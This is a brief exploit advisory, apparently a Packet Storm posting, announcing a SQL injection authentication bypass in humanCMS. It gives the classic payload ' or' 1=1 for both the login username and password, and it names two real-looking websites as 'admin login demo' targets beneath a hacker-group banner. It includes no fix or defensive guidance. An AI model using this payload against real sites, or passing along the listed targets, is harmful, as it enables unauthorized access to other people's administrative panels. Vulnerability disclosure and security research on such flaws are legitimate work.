humanCMS suffers from a remote SQL injection vulnerability that allows for authentication bypass.
98c38a3e81304f1aba2677eb6ac2bd0089fa2b33d8e716cb40e98bff4347d87c()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()
() ()
() f KHatr Zfaft Zenta9 f Zfaft Galo ya khir CHirbakhzer ()
() ()
()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()
[+] humanCMS (Auth Bypass) SQL Injection Vulnerability
[+] Discovered by next
[+] www.sa3eka.com ()()()()() www.m4r0c-s3curity.cc
[+] vie.0[at]hotmail.com
()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()
[+] Home Page : http://www.squarelabel.com
"humanCMS site description"
[+] Auth Bypass
[+] expolit : username : ' or' 1=1
password : ' or' 1=1
[+] admin login demo :
http://www.festivalcite.ch/index.php?id=&action=login
http://www.squarelabel.com/index.php?id=&action=login
()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed